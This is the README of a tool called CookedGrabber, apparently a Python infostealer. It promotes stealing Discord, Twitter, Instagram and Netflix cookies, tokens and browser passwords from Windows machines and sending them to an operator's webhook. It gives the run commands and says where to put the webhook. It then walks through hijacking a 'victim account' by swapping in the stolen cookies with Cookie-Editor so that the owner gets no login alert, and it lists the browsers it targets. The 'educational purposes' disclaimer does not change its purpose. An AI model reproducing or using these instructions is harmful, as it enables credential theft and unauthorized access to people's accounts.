Discord, Twitter, Instagram, netflix cookies, token grabber and also password grabber. Grabbing from all web browsers !
Usage • Cookies • Compatibility • Disclaimer • Contributing • License • Other projects
Loved the tool? Please consider donating 💸 to help it improve!
- Windows 10 OS only (win32, for x86, x86_64, and arm64 architectures)
- Python 3.x (python 3.9 used for the project.)
- Modules:
$ pip install -r requirements.txt
There is 2 ways to run the script.
You need to add your webhook(s) link(s) to the script from this line:
CookedGrabber/CookedGrabber.py
Line 290 in f753c4b
You can also run the program by giving several arguments (the webhook(s) link(s)):
py CookedGrabber.py YOUR WEBHOOK(s) URL(s)
Cookies are text files with small pieces of data like a username and password that are used to identify your computer as you use a computer network. Specific cookies known as HTTP cookies are used to identify specific users and improve your web browsing experience.
Data stored in a cookie is created by the server upon your connection. This data is labeled with an ID unique to you and your computer.
When the cookie is exchanged between your computer and the network server, the server reads the ID and knows what information to specifically serve to you.
Websites use HTTP cookies to streamline your web experiences. Without cookies, you’d have to login again after you leave a site or rebuild your shopping cart if you accidentally close the page. Making cookies an important a part of the internet experience.
Since the data in cookies doesn't change, cookies themselves aren't harmful. They can't infect computers with viruses or other malware. However, some cyberattacks can hijack cookies and enable access to your browsing sessions.
The server only sends the cookie when it wants the web browser to save it. If you’re wondering “where are cookies stored,” it’s simple: your web browser will store it locally to remember the “name-value pair” that identifies you.
⚠ When attempting to connect to an account using cookies, the system does not generate a new login request to the server. As a result, the account owner does not receive an email notification
regarding a new login attempt. The server mistakenly assumes that the activity is coming from the legitimate account holder, leaving the owner unaware of any unauthorized access. !
☢ This reveals major security breaches in general websites and social networks ! ☢
So to use cookies to log into the victim account, you must have a cookies extension. I recommand Cookie-Editor. To bypass website security you must be already connected to your personnal account to generate all cookies needed for the website. After being sure that all default cookies have been generated use your cookies extension to replace your personnal id account cookies with the grabbed victim account cookies.
You need to put each value in it's place with the cookies extension:
Once the cookies replaced and saved, refresh the page and you are logged in the victim account !
Browsers | Cookies and token grabber 🔍 | Password stealer 💥 |
---|---|---|
Chrome | ✅ | ✅ |
Edge | ✅ | ❌ |
Brave | ✅ | ❌ |
Firefox | ✅ | ❌ |
Opera (GX) | ✅ | ❌ |
Vivaldi | ✅ | ❌ |
Chromium navigator | ✅ | ❌ |
- Only for educationnal puposes.
- We decline any responsability in case of misuse of this code.
Your contributions are always welcome! if you contribute we will show your account in the README file ! Please have a look at the contribution guidelines first. 🎉
Working on your first Pull Request? You can learn how from this free series How to Contribute to an Open Source Project on GitHub